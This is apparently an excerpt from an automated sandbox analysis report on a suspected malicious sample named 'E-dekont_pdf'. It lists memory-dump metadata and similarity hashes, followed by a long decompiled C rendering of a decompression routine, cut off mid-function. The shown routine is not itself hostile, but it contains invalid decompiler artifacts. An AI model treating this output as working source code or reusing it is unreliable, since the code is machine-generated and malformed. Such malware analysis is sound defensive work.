                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                              • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                              • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                              • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_push("true");
									_pop(_t576);
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														__ebx = __edx + 1;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
